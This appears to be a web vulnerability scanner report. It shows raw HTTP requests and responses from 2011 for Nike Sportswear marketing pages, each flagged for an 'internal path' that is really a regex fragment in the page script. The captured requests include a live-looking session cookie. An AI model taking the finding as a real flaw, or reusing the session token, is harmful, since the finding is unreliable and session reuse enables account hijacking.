eVar4:"LOGGED_IN_STATUS",
eVar8:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop2:"FLASH_VERSION",
prop12:"sportswear", // hard coded in - previously soccer
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop17:"home", // need to set this correctly - at present it is a duplicate of what was on the old tracker_obj
prop18:"aw77_more_than",
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID",
trackExternalLinks:true,
linkInternalFilters:"javascript:,nike,rga"
};
var track_site = "USSPRT";
var currentUrl = window.location.href;
var trackingSuite = "nikesportswearus,nikesportswearnam,nikeall";
// Only include commerce rollup tag in commerce enabled pages (so far just Bootroom/Players)
if (currentUrl.indexOf("bootroom") != -1 || currentUrl.indexOf("players") != -1) {
trackingSuite = trackingSuite + ",";
}
var sitewide_tracker_obj =
{
account:trackingSuite,
currency:"USD",
charset:"UTF-8"
};
var nav_tracker_obj=
{
s_account:sitewide_tracker_obj.account,
prefix:"USSPRT>",
setup:
{
pageURL:location.href,
referrer:document.referrer
},
persistent:
{
server:"nikesoccer",
channel:"soccer",
prop12:"sportswear",
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID"
}
};
</script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" charset="utf-8">
var NIKE_COMMERCE_CONFIG={ title : "Nike Football" , site : "sportswear" , membershipId : "304" , registerPath : "nikeos/p/sportswear/${LANG_LOCALE}/profile?page=register&fields=&continueURL=profile%3Fpage%3Dpersonal_info" , siteId : "47" , siteId_EMEA : "48" , userType : "defaultUser" , categoryHeadersEnabled : "true" , languageTunnelURL : "/nikeos/p/sportswear/language_tunnel/?change_region=true\n\n" , configBaseURL : "/sportswear/global/xml/commerce/" , commerceBaseURL : "commerce" , US_Catalog : "102601" , EMEA_Catalog : "102602" , commerceNavTabs : [ "shop" , "products" , "nikeid" , "nikeid_landing" ] , DETERMINE_COMMERCE_REGION : { en_US : [ { US : "1" } , { AT : "2" , BE : "2" , DK : "2" , FI : "2" , FR : "2" , DE : "2" , IE : "2" , IT : "2" , LU : "2" , NL : "2" , ES : "2" , SE : "2" , GB : "2" , CZ : "2" , GR : "2" , HU : "2" , NO : "3" , PL : "2" , PT : "2" , SI : "2" , CH : "3" } ] , es_ES : { ES : "2" } , de_DE : { DE : "2" } , fr_FR : { FR : "2" } , it_IT : { IT : "2" } , cs_CZ : { CZ : "3" } , pl_PL : { PL : "3" } } };
</script>
<script type="text/javascript" src="/nikeos/global/js/nikecommerce.js"></script>
<script type="text/javascript">
ns.gv.xmlpath = "/aw77/modules/more_than/";
</script>
<!-- begin aw77 header -->
<title>Nike Sportswear</title>
<link type="text/css" rel="stylesheet" href="/sportswear/assets/aw77/css/common.css" media="screen"/>
<script type="text/javascript" src="/sportswear/assets/aw77/js/common.js"></script>
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/aw77/css/ie/ie.css"/>
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/aw77/css/ie/ie6.css"/>
<![endif]-->
<link rel="stylesheet" href="/sportswear/assets/aw77/css/locales/en_US.css" type="text/css" media="screen"/>
<!-- end aw77 header -->
<!--<link rel="stylesheet" href="/sportswear/global/features/aw77_stories/shell/nsw_master.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<link rel="stylesheet" href="/sportswear/global/css/home3.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/sportswear/global/css/aw77/aw77_morethan.css" type="text/css" media="screen" />
-->
</head>
<body id="aw77" class="NONE_SET">
<div id="bodywrapper">
<noscript><div class="noscriptmsg">You need to enable JavaScript to get the most out of the Nike Football web site.</div></noscript>
<div id="p_outerwrapper">
<div id="p_outerwrapperinner">
<div id="p_innerwrapper" class="en_us">
<div id="p_innerwrapperheader">
<div id="p_contentstub">
<ul>
<li><p class="breadcrumb"><a href="http://www.nike.com/">Nike</a> &gt; <a href="/nikeos/p/sportswear/en_US/">Nike Sportswear</a> &gt; AW77</li>
<li><h1><strong>Nike Sportswear</strong></h1></li>
</ul>
<div class="cf">
<div class="leftcol fullwidth">
<p>Running in the rain gets cold-and old-fast. Back in 1977, Athletics West Track & Field Club founder (and Nike's third employee) Geoff Hollister created this sturdy sweatshirt with a multi-panel hood to keep out the rain and a half-zip to keep its weight down. Years passed. The sweatshirt kept its head down, did its job. And then, BAM, the hoodie. Suddenly everyone's making one, yet still only one gets it right. Nike Sportswear. The multi-panel scuba hood is still there, but it's got a higher neck for a face cradling fit. Seams are bonded, cuffs flat knit and composite fabrics provide the same look with cocoon-like comfort. Only now it's perfect. This isn't the sweatshirt you flirt with. This is the sweatshirt you marry. </p>
</div>
</div>
</div>
<div id="p_lozenge">
<div id="nav-module-top_swf"></div>
</div>
<div id="p_navigation">
<div class="navigationinner">
<div id="nav-module">
<form id="nav_input_form" action="javascript:search()" method="post"><input id="nav_input" type="text" name="searchquery" size="10"/></form>
<div id="nav-module-left_swf">
<!-- NAV XML OBJECT, SITEXML AT BOTTOM -->
<div id="nav" default_font="Victory-Neue Bold" embed_font="true" class="invisible">
<div id="search" font="Victory-Neue Light">
<a class="base" href="http://www.nike.com/nikeos/p/sportswear/en_US/search?" ></a>
<div class="displayText" label="openLabel" >SEARCH</div>
<div class="displayText" label="closeLabel">CLOSE</div>
<span class="query">srch=</span>
</div>
<!-- Profile -->
<div id="profile" preload="true" href="https://www.nike.com/services/profileService?action=getprofile">
<a id="login" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=signin">LOGIN</a>
<a id="logout" href="https://www.nike.com/services/profileService?action=logout">LOGOUT</a>
<a id="account" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=mynike">VIEW MY PROFILE</a>
<span id="profile">PROFILE</span>
<span class="name">fields=screenname</span>
</div>
<!-- AUDIO PLAYER
<div class="audioButton" href="/sportswear/us/en_US/xml/flashmodule/audioplayer/audioConfig.xml"></div>
-->
<!-- PRODUCTS -->
<div class="primaryButton" label="shop" openonclick="true" commerce_dependant="true">
<a class="action" type="none" href="#">SHOP</a>
<div class="secondaryButton" label="men" openonclick="false">
<a class="action" type="none">Men</a>
<div class="tertiaryPanel">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^4294965514^4294967157&p=PWP&t=Men%27s%20Products" position="top">All</a>
<div class="tertiaryColumn" label=&..
- /sportswear/destroyer/we-are-the-destroyers

/sportswear/destroyer/we-are-the-destroyers

http://www.nike.com/sportswear/destroyer/we-are-the-destroyers?locale=en_US

Identified Internal Path(s)

/dev/i

Request

GET /sportswear/destroyer/we-are-the-destroyers?locale=en_US HTTP/1.1
Referer: http://www.nike.com/nikeos/p/sportswear/en_US/?country=US&lang_locale=en_US&blog=en_US&sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=utf-8
Content-Length: 7380
Cache-Control: max-age=176
Expires: Mon, 18 Apr 2011 19:20:25 GMT
Date: Mon, 18 Apr 2011 19:17:29 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="title" content="Nike Sportswear"/>
<meta name="description" content="destroyer description"/>
<meta name="keywords" content="destroyer keywords"/>
<meta http-equiv="imagetoolbar" content="no"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1;IE=7" />
<meta name="search_section" content="general" />
<meta name="category" content="football" />
<meta name="locale" content="en_US" />
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework.css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie.css" />
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie6.css" />
<![endif]-->
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/json2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery.cookie.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-1.5.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-2.1.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/eventbridge.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/cufon-yui-1.0.9.js"></script>
<script type="text/javascript">var fontFamily = "global";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/DIN.js"></script>
<script type="text/javascript">var fontFamily = "header";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript">var fontFamily = "body";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "buttons";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "brand";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/plugins/videoplayer/jquery.videoplayer.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/framework.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/services.js"></script>
<script type="text/javascript">
// Switch JQuery to use $ as well as JQ for legacy purposes if switched on in config XML
var $ = jQuery;
var JQ = jQuery;
ns.gv.locale = "en_US";
ns.gv.language = "en";
ns.gv.country = "us";
ns.gv.textReplacement = true;
ns.gv.commerceCountries = "CZ,AT,CH,DE,BE,DE,DK,ES,FI,FR,GB,GR,HU,IE,IT,LU,NL,NO,PL,PT,SE,SI";
ns.gv.site_mode = "prod";
ns.gv.blog_base_url = "http://inside.nike.com";
ns.gv.base_url = "http://www.nike.com";
ns.gv.commerce_url = "http://store.nike.com";
ns.gv.base_secure_url = "https://www.nike.com";
ns.gv.social_url = "http://www.nikegadgets.com/";
ns.gv.social_secure_url = "https://secure-www.nikegadgets.com/";
ns.gv.upm_service_url = "https://www.nike.com/services/profileService";
ns.gv.services_urlPrefix = "/nsl";
ns.gv.trackingEnabled = true;
ns.gv.navigationItem = "";
ns.gv.modals = {};
ns.gv.modals.global = {
close: 'Close'
};
ns.gv.modals.video = {
};
ns.gv.modals.tos = {
title: 'Terms and Conditions',
header: 'Terms of Use and Privacy Policy Update',
copy: 'Nike has expanded the features in the site you are visiting and we have updated our <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Privacy Policy and Terms of Use</a>. To continue on to the site, please review the updated <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Terms of Use and Privacy Policy</a> and select ACCEPT. If you do not want to accept the Terms of Use, select CANCEL to be logged out and returned to the Nike Football home page.',
cancel: 'CANCEL',
accept: 'ACCEPT'
};
ns.gv.useFontNames = false;
</script>
<style type="text/css">
body { background-image:url(/sportswear/assets/images/common/bg-home.jpg); }
</style>
<!--
prop18: destroyer_we_are_the_destroyers
-->
<script type="text/javascript" charset="utf-8">
// Updated on 15/4/2010 : NWH
// CAN BE REINSTATED AFTER SWFOBJECT 1.5 REMOVED
/*
var deconcept = {};
deconcept.SWFObjectUtil = {};
deconcept.SWFObjectUtil.getPlayerVersion = function(){
var flashVersion = swfobject.getFlashPlayerVersion();
var toReturn = { "major": flashVersion.major, "minor": flashVersion.minor, "rev": flashVersion.release };
return toReturn;
}
*/
/* NIKEOS */
if (!window.NIKEOS) var NIKEOS = {};
/*
SET THE SITE MODE
*/
if (location.host.match(/inside-staging/i) || location.host.match(/(env\d*)-brand/i) || location.host.match(/(ecn\d*)-www/i) || location.host.match(/dev/i))
NIKEOS.site_mode = 'staging';
else if (location.host.match(/nike\.com/i))
NIKEOS.site_mode = 'prod';
else if (location.host.match(/^[^\.]*$/i))
NIKEOS.site_mode = 'localhost';
else
NIKEOS.site_mode = 'dev';
NIKEOS.protocol = (location.protocol == 'https:') ? 'https://' : 'http://';
NIKEOS.currentURL = escape(location.href);
NIKEOS.BASE = {
localhost : NIKEOS.protocol + location.host,
dev : NIKEOS.protocol + (NIKEOS.siteHost || 'nike-dev4.ny.rga.com'),
staging : NIKEOS.protocol + (NIKEOS.siteHost || 'ecn10-www.nike.com'),
prod : NIKEOS.protocol + 'www.nike.com'
};
NIKEOS.setDev = function(url) {
NIKEOS.BASE.dev = NIKEOS.protocol + url;
};
/* End NIKEOS */
var site_data=
{
lang_locale:"en_US",
country:"US",
nav_current: "",
commerce_mode:"US",
link_suffix:"",
region:"US",
platypus_region:"en_US",
blog_locale:"en_US",
tracking_region:"us",
video_region:"en_US"
};
var tracker_obj=
{
pageName:"USSPRT>destroyer>landing",
server:"nikesoccer",
channel:"sportswear", // hard coded in - previously soccer
eVar4:"LOGGED_IN_STATUS",
eVar8:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop2:"FLASH_VERSION",
prop12:"sportswear", // hard coded in - previously soccer
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop17:"home", // need to set this correctly - at present it is a duplicate of what was on the old tracker_obj
prop18:"destroyer_we_are_the_destroyers",
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID",
trackExternalLinks:true,
linkInternalFilters:"javascript:,nike,rga"
};
var track_site = "USSPRT";
var currentUrl = window.location.href;
var trackingSuite = "nikesportswearus,nikesportswearnam,nikeall";
// Only include commerce rollup tag in commerce enabled pages (so far just Bootroom/Players)
if (currentUrl.indexOf("bootroom") != -1 || currentUrl.indexOf("players") != -1) {
trackingSuite = trackingSuite + ",";
}
var sitewide_tracker_obj =
{
account:trackingSuite,
currency:"USD",
charset:"UTF-8"
};
var nav_tracker_obj=
{
s_account:sitewide_tracker_obj.account,
prefix:"USSPRT>",
setup:
{
pageURL:location.href,
referrer:document.referrer
},
persistent:
{
server:"nikesoccer",
channel:"soccer",
prop12:"sportswear",
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID"
}
};
</script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" charset="utf-8">
var NIKE_COMMERCE_CONFIG={ title : "Nike Football" , site : "sportswear" , membershipId : "304" , registerPath : "nikeos/p/sportswear/${LANG_LOCALE}/profile?page=register&fields=&continueURL=profile%3Fpage%3Dpersonal_info" , siteId : "47" , siteId_EMEA : "48" , userType : "defaultUser" , categoryHeadersEnabled : "true" , languageTunnelURL : "/nikeos/p/sportswear/language_tunnel/?change_region=true\n\n" , configBaseURL : "/sportswear/global/xml/commerce/" , commerceBaseURL : "commerce" , US_Catalog : "102601" , EMEA_Catalog : "102602" , commerceNavTabs : [ "shop" , "products" , "nikeid" , "nikeid_landing" ] , DETERMINE_COMMERCE_REGION : { en_US : [ { US : "1" } , { AT : "2" , BE : "2" , DK : "2" , FI : "2" , FR : "2" , DE : "2" , IE : "2" , IT : "2" , LU : "2" , NL : "2" , ES : "2" , SE : "2" , GB : "2" , CZ : "2" , GR : "2" , HU : "2" , NO : "3" , PL : "2" , PT : "2" , SI : "2" , CH : "3" } ] , es_ES : { ES : "2" } , de_DE : { DE : "2" } , fr_FR : { FR : "2" } , it_IT : { IT : "2" } , cs_CZ : { CZ : "3" } , pl_PL : { PL : "3" } } };
</script>
<script type="text/javascript" src="/nikeos/global/js/nikecommerce.js"></script>
<!-- begin destroyer header -->
<title>Nike Sportswear</title>
<link type="text/css" rel="stylesheet" href="/sportswear/assets/destroyer/css/common.css" media="screen"/>
<script type="text/javascript" src="/sportswear/assets/destroyer/js/common.js"></script>
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/destroyer/css/ie/ie.css"/>
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/destroyer/css/ie/ie6.css"/>
<![endif]-->
<link rel="stylesheet" href="/sportswear/assets/destroyer/css/locales/en_US.css" type="text/css" media="screen"/>
<!-- end destroyer header -->
<!--<link rel="stylesheet" href="/sportswear/global/features/aw77_stories/shell/nsw_master.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<link rel="stylesheet" href="/sportswear/global/css/home3.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/sportswear/global/css/aw77/aw77_morethan.css" type="text/css" media="screen" />
-->
</head>
<body id="destroyer">
<div id="bodywrapper">
<noscript><div class="noscriptmsg">You need to enable JavaScript to get the most out of the Nike Football web site.</div></noscript>
<div id="p_outerwrapper">
<div id="p_outerwrapperinner">
<div id="p_innerwrapper" class="en_us">
<div id="p_innerwrapperheader">
<div id="p_contentstub">
<ul>
<li><p class="breadcrumb"><a href="http://www.nike.com/">Nike</a> &gt; <a href="/nikeos/p/sportswear/en_US/">Nike Sportswear</a> &gt; destroyer</li>
<li><h1><strong>Nike Sportswear</strong></h1></li>
</ul>
<div class="cf">
<div class="leftcol fullwidth">
<p>DESTROY TO CREATE. ALL CREATORS ARE DESTROYERS. THE PASSION FOR DESTRUCTION IS A CREATIVE PASSION. BECAUSE THE OLD MUST DIE FOR THE NEW TO BE BORN. WRITE YOUR OWN LINES. MAKE YOUR OWN PATH. HABIT MAKES YOU NUMB. DO SOMETHING NEW – BUILD THE PALACE OF THE FUTURE WITH THE RUBBLE OF THE PAST. TO BE BORN AGAIN, FIRST YOU HAVE TO DIE. DON'T WAIT FOR THE FUTURE: CREATE IT.</p>
</div>
</div>
</div>
<div id="p_lozenge">
<div id="nav-module-top_swf"></div>
</div>
<div id="p_navigation">
<div class="navigationinner">
<div id="nav-module">
<form id="nav_input_form" action="javascript:search()" method="post"><input id="nav_input" type="text" name="searchquery" size="10"/></form>
<div id="nav-module-left_swf">
<!-- NAV XML OBJECT, SITEXML AT BOTTOM -->
<div id="nav" default_font="Victory-Neue Bold" embed_font="true" class="invisible">
<div id="search" font="Victory-Neue Light">
<a class="base" href="http://www.nike.com/nikeos/p/sportswear/en_US/search?" ></a>
<div class="displayText" label="openLabel" >SEARCH</div>
<div class="displayText" label="closeLabel">CLOSE</div>
<span class="query">srch=</span>
</div>
<!-- Profile -->
<div id="profile" preload="true" href="https://www.nike.com/services/profileService?action=getprofile">
<a id="login" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=signin">LOGIN</a>
<a id="logout" href="https://www.nike.com/services/profileService?action=logout">LOGOUT</a>
<a id="account" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=mynike">VIEW MY PROFILE</a>
<span id="profile">PROFILE</span>
<span class="name">fields=screenname</span>
</div>
<!-- AUDIO PLAYER
<div class="audioButton" href="/sportswear/us/en_US/xml/flashmodule/audioplayer/audioConfig.xml"></div>
-->
<!-- PRODUCTS -->
<div class="primaryButton" label="shop" openonclick="true" commerce_dependant="true">
<a class="action" type="none" href="#">SHOP</a>
<div class="secondaryButton" label="men" openonclick="false">
<a class="action" type="none">Men</a>
<div class="tertiaryPanel">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^4294965514^4294967157&p=PWP&t=Men%27s%20Products" position="top">All</a>
<div class="tertiaryColumn" label="men_shoes" title="Shoes" width="130">
<div class="tertiaryButton" label="men_shoes_af1">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^12001^4294961611^4294965496^4294965514^4294967157&p=PWP&t=Men%27s%20Air%20Force%201%20Shoes">Air Force 1</a>
</div>
<div class="tertiaryButton" label="men_shoes_am">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^12001^4294961626^4294965496^429496551..
- /sportswear/aw77/77-looks

/sportswear/aw77/77-looks

http://www.nike.com/sportswear/aw77/77-looks?locale=en_US

Identified Internal Path(s)

/dev/i

Request

GET /sportswear/aw77/77-looks?locale=en_US HTTP/1.1
Referer: http://www.nike.com/nikeos/p/sportswear/en_US/?country=US&lang_locale=en_US&blog=en_US&sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=utf-8
Content-Length: 7671
Cache-Control: max-age=900
Expires: Mon, 18 Apr 2011 19:32:30 GMT
Date: Mon, 18 Apr 2011 19:17:30 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="title" content="Nike Sportswear"/>
<meta name="description" content="AW77 Insiders. Take it to the Street. The code says don't play your style straight - mix it, twist, break it. From the AW77 to the AM90, let the Nike Sportswear Insiders show you their combination to unlocking the look."/>
<meta name="keywords" content="aw77, am90, sportswear insiders"/>
<meta http-equiv="imagetoolbar" content="no"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1;IE=7" />
<meta name="search_section" content="general" />
<meta name="category" content="football" />
<meta name="locale" content="en_US" />
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework.css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie.css" />
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie6.css" />
<![endif]-->
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/json2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery.cookie.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-1.5.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-2.1.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/eventbridge.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/cufon-yui-1.0.9.js"></script>
<script type="text/javascript">var fontFamily = "global";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/DIN.js"></script>
<script type="text/javascript">var fontFamily = "header";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript">var fontFamily = "body";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "buttons";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "brand";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/plugins/videoplayer/jquery.videoplayer.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/framework.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/services.js"></script>
<script type="text/javascript">
// Switch JQuery to use $ as well as JQ for legacy purposes if switched on in config XML
var $ = jQuery;
var JQ = jQuery;
ns.gv.locale = "en_US";
ns.gv.language = "en";
ns.gv.country = "us";
ns.gv.textReplacement = true;
ns.gv.commerceCountries = "CZ,AT,CH,DE,BE,DE,DK,ES,FI,FR,GB,GR,HU,IE,IT,LU,NL,NO,PL,PT,SE,SI";
ns.gv.site_mode = "prod";
ns.gv.blog_base_url = "http://inside.nike.com";
ns.gv.base_url = "http://www.nike.com";
ns.gv.commerce_url = "http://store.nike.com";
ns.gv.base_secure_url = "https://www.nike.com";
ns.gv.social_url = "http://www.nikegadgets.com/";
ns.gv.social_secure_url = "https://secure-www.nikegadgets.com/";
ns.gv.upm_service_url = "https://www.nike.com/services/profileService";
ns.gv.services_urlPrefix = "/nsl";
ns.gv.trackingEnabled = true;
ns.gv.navigationItem = "aw77_looks";
ns.gv.modals = {};
ns.gv.modals.global = {
close: 'Close'
};
ns.gv.modals.video = {
};
ns.gv.modals.tos = {
title: 'Terms and Conditions',
header: 'Terms of Use and Privacy Policy Update',
copy: 'Nike has expanded the features in the site you are visiting and we have updated our <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Privacy Policy and Terms of Use</a>. To continue on to the site, please review the updated <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Terms of Use and Privacy Policy</a> and select ACCEPT. If you do not want to accept the Terms of Use, select CANCEL to be logged out and returned to the Nike Football home page.',
cancel: 'CANCEL',
accept: 'ACCEPT'
};
ns.gv.useFontNames = false;
</script>
<style type="text/css">
body { background-image:url(/sportswear/assets/images/common/bg-home.jpg); }
</style>
<!--
prop18: aw77_77_looks
-->
<script type="text/javascript" charset="utf-8">
// Updated on 15/4/2010 : NWH
// CAN BE REINSTATED AFTER SWFOBJECT 1.5 REMOVED
/*
var deconcept = {};
deconcept.SWFObjectUtil = {};
deconcept.SWFObjectUtil.getPlayerVersion = function(){
var flashVersion = swfobject.getFlashPlayerVersion();
var toReturn = { "major": flashVersion.major, "minor": flashVersion.minor, "rev": flashVersion.release };
return toReturn;
}
*/
/* NIKEOS */
if (!window.NIKEOS) var NIKEOS = {};
/*
SET THE SITE MODE
*/
if (location.host.match(/inside-staging/i) || location.host.match(/(env\d*)-brand/i) || location.host.match(/(ecn\d*)-www/i) || location.host.match(/dev/i))
NIKEOS.site_mode = 'staging';
else if (location.host.match(/nike\.com/i))
NIKEOS.site_mode = 'prod';
else if (location.host.match(/^[^\.]*$/i))
NIKEOS.site_mode = 'localhost';
else
NIKEOS.site_mode = 'dev';
NIKEOS.protocol = (location.protocol == 'https:') ? 'https://' : 'http://';
NIKEOS.currentURL = escape(location.href);
NIKEOS.BASE = {
localhost : NIKEOS.protocol + location.host,
dev : NIKEOS.protocol + (NIKEOS.siteHost || 'nike-dev4.ny.rga.com'),
staging : NIKEOS.protocol + (NIKEOS.siteHost || 'ecn10-www.nike.com'),
prod : NIKEOS.protocol + 'www.nike.com'
};
NIKEOS.setDev = function(url) {
NIKEOS.BASE.dev = NIKEOS.protocol + url;
};
/* End NIKEOS */
var site_data=
{
lang_locale:"en_US",
country:"US",
nav_current: "aw77_looks",
commerce_mode:"US",
link_suffix:"",
region:"US",
platypus_region:"en_US",
blog_locale:"en_US",
tracking_region:"us",
video_region:"en_US"
};
var tracker_obj=
{
pageName:"USSPRT>aw77\>77_looks>landing",
server:"nikesoccer",
channel:"sportswear", // hard coded in - previously soccer
eVar4:"LOGGED_IN_STATUS",
eVar8:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop2:"FLASH_VERSION",
prop12:"sportswear", // hard coded in - previously soccer
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop17:"home", // need to set this correctly - at present it is a duplicate of what was on the old tracker_obj
prop18:"aw77_77_looks",
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID",
